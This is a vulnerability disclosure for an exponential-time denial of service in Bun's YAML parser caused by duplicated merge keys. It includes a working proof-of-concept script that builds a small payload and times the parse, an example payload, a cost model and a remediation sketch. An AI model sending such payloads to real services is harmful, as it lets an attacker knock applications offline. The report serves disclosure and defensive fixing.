Summary
Exponential merge keys in Bun.YAML.parse trigger CPU exhaustion
Bun.YAML.parse materialises YAML mappings by iterating every merge (<<) entry and blindly appending the referenced property list to the target object (src/bun.js/api/YAMLObject.zig:1034-1045). Because the loop does not track merge depth or repeated anchors, an attacker can craft a document where each level merges all previous anchors (<<: [*a0, *a1, …]). The parser repeatedly copies the entire accumulated property array for each level, resulting in exponential work while the payload remains only a few kilobytes. Running the supplied payload against Bun 1.3.0 (bun --eval …) shows parse times climbing past 9 seconds on a single CPU core, enabling a trivial network DoS via untrusted YAML input.
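For illustration, a depth-3 instance of the payload shape (exactly what the proof-of-concept's build(3) emits) looks like this; each anchor merges every earlier anchor, so the materialised property count doubles per level:

```yaml
a0: &a0
 k0: 0
a1: &a1
 <<: [*a0]
 k1: 1
a2: &a2
 <<: [*a0, *a1]
 k2: 2
a3: &a3
 <<: [*a0, *a1, *a2]
 k3: 3
root:
 <<: *a3
```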
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Source → Sink
src/bun.js/api/YAMLObject.zig
Line 915-960 · Bun.YAML.parse
src/bun.js/api/YAMLObject.zig
Line 1034-1045 · ParserCtx.toJS (object materialisation loop)
Attack surface
Any Bun application that calls Bun.YAML.parse (or YAML.parse) on user-controlled data—configuration endpoints, API payloads, etc.—is affected.
Preconditions
None; the attacker only needs the ability to submit a YAML document. No authentication or special privileges are required.
Impact
Repeated requests allow an unauthenticated attacker to peg a CPU core and starve other work, causing a denial of service. Memory usage also spikes due to repeated property duplication.
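The growth rate can be modelled without running Bun at all. The following plain-JavaScript sketch is a model of the copy-per-merge behaviour described in the exploit path below, not Bun's actual Zig code; it counts how many property writes the naive copy strategy performs on the PoC's anchor chain:

```javascript
// Model of the vulnerable pattern: anchor a_i merges all earlier anchors
// (<<: [*a0, ..., *a{i-1}]) and each merge appends a full copy of the
// referenced anchor's property list, mirroring the appendSlice semantics.
function naivePropertyCount(depth) {
  const counts = [1]; // a0 carries a single key, k0
  for (let i = 1; i <= depth; i++) {
    let total = 1; // the anchor's own key, k_i
    for (let j = 0; j < i; j++) total += counts[j]; // copy every earlier list
    counts.push(total);
  }
  return counts[depth]; // works out to counts[d] = 2^d
}

console.log(naivePropertyCount(24)); // 16777216 property writes at depth 24
```

Each extra level doubles the work, so a depth around 30 pushes the naive strategy past a billion property writes while the document itself grows by only a few lines.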
Exploit path
How the issue forms.
1. Bun.YAML.parse accepts attacker-controlled input and invokes the YAML parser without imposing size or recursion limits.

   const input_value = callFrame.argumentsAsArray(1)[0];

2. parseFlowMapping / parseBlockMapping build AST nodes whose properties slices simply inline every merge (<<) target, duplicating anchors instead of referencing them.

   try props.appendSlice(value_obj.properties.slice());

3. ParserCtx.toJS iterates the properties slice and converts each entry into JS strings/values with no merge-depth accounting.

   const key_str = try key.toBunString(ctx.global);
   try obj.putMayBeIndex(ctx.global, &key_str, value);

4. putMayBeIndex stores each property on the JS object, so the exponential number of duplicated keys translates directly into CPU time before YAML.parse returns to user code.

   object->putDirectMayBeIndex(...);

Proof of concept
Reproduction.
Environment
Requirements: macOS 15.1 (Apple M1), Bun 1.3.0 (system install).
Verify version:
bun --version
# 1.3.0
Configuration
Execute the following script, which builds a depth-24 merge payload (~2.2 KB) and measures parse time:
/usr/bin/env bun --eval '
import { YAML } from "bun";
function build(depth) {
  const lines = [];
  lines.push(`a0: &a0\n k0: 0`);
  for (let i = 1; i <= depth; i++) {
    const refs = Array.from({ length: i }, (_, j) => `*a${j}`).join(", ");
    lines.push(`a${i}: &a${i}\n <<: [${refs}]\n k${i}: ${i}`);
  }
  lines.push(`root:\n <<: *a${depth}`);
  return lines.join("\n");
}
const payload = build(24);
const start = Date.now();
YAML.parse(payload);
console.log({ depth: 24, durationMs: Date.now() - start, payloadBytes: payload.length });
'
Delivery
Local execution via bun --eval is sufficient for reproduction; in a deployed application, the same payload would arrive through whatever channel feeds Bun.YAML.parse (an HTTP request body, an uploaded configuration file, etc.).
Outcome
Bun.YAML.parse spends ~9.5 seconds materialising a 2.2 KB document, allowing a remote attacker to keep a core saturated by repeatedly sending the payload. Higher depths continue to grow exponentially, so parallel requests can knock the process offline entirely.
Remediation
Guidance.
Deduplicate merge keys while tracking merge depth or anchor references so each YAML node is materialised at most once. The patch under review introduces a MappingProps helper (src/interchange/yaml.zig:986-1041) that:
- Keeps a set of seen keys when applying merges, preventing unbounded duplication.
- Reuses existing properties lists instead of copying them repeatedly.
Ensure similar safeguards exist for both flow and block mappings, and add unit tests (e.g., test/js/bun/yaml/yaml.test.ts) that parse the PoC payload with a tight timeout to prevent regressions. Consider also rejecting documents that exceed a reasonable merge depth or property count to provide a defense in depth.
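The dedup strategy can be illustrated in plain JavaScript. This is a hedged sketch with hypothetical names (resolveNode, resolveChain); the real MappingProps helper is implemented in Zig, and this only mirrors its idea of tracking seen keys and materialising each anchor once:

```javascript
// Each mapping node carries its own key/value pairs plus an ordered list of
// merge targets. A `seen` set ensures every key is materialised at most once,
// following YAML merge-key precedence: the mapping's own keys win, and earlier
// merge entries win over later ones.
function resolveNode(node, anchors) {
  const out = {};
  const seen = new Set();
  const put = (key, value) => {
    if (!seen.has(key)) { // first writer wins
      seen.add(key);
      out[key] = value;
    }
  };
  for (const [k, v] of Object.entries(node.own)) put(k, v);
  for (const name of node.merges) {
    for (const [k, v] of Object.entries(anchors[name])) put(k, v);
  }
  return out;
}

// Resolve the PoC's anchor chain: each anchor is built exactly once, and later
// merges read the finished object instead of re-copying property lists.
function resolveChain(depth) {
  const anchors = { a0: { k0: 0 } };
  for (let i = 1; i <= depth; i++) {
    const merges = Array.from({ length: i }, (_, j) => `a${j}`);
    anchors[`a${i}`] = resolveNode({ own: { [`k${i}`]: i }, merges }, anchors);
  }
  return resolveNode({ own: {}, merges: [`a${depth}`] }, anchors);
}
```

With this approach the PoC chain resolves in polynomial rather than exponential time, because the work per anchor is bounded by key lookups into already-resolved objects instead of wholesale list copies.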
